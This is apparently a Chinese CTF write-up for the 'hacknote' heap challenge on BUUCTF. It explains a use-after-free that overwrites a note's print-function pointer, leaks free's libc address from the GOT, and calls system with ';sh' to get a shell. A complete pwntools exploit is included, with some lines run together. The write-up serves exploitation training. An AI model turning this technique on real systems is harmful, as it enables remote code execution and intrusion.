先看保护
32位,没开pie,got表可修改
看ida
总的来说就是alloc创建堆块,free释放堆块,show打印堆块内容
但alloc处的函数比较特别,他会先申请一个0x8大小的堆来存放与puts相关的指针
完整exp:
from pwn import*
from LibcSearcher import*
p=process('./hacknote')
p=remote('node5.buuoj.cn',28080)
puts=0x0804862b
free_got=0x804A018def alloc(size,context):p.sendlineafter(b'Your choice :',str(1))p.sendlineafter(b'Note size :',str(size))p.sendafter(b'Content ',context)
def free(index):p.sendlineafter(b'Your choice :',str(2))p.sendlineafter(b'Index :',str(index))
def show(index):p.sendlineafter(b'Your choice :',str(3))p.sendlineafter(b'Index :',str(index))alloc(0x10,p32(0))
alloc(0x10,p32(0))
free(0)
free(1)
alloc(0x8,p32(puts)+p32(free_got))
show(0)
free_addr=u32(p.recvuntil(b'\xf7')[-4:])
print(free_addr)
libc=LibcSearcher('free',free_addr)
libcbase=free_addr-libc.dump('free')
system=libcbase+libc.dump('system')
free(2)
alloc(0x8,p32(system)+b';sh\x00')
show(0)
p.interactive()
补充点1:free(2)处,虽然堆块没有将相应的指针置0,但是当我们申请0x8大小的堆块时这一组堆块会被设置为堆块2,所以这里用free(2)
补充点2:system的参数要用;sh\x00,我尝试使用bash没有成功,可能是因为运行过程中无关数据会扰乱参数传递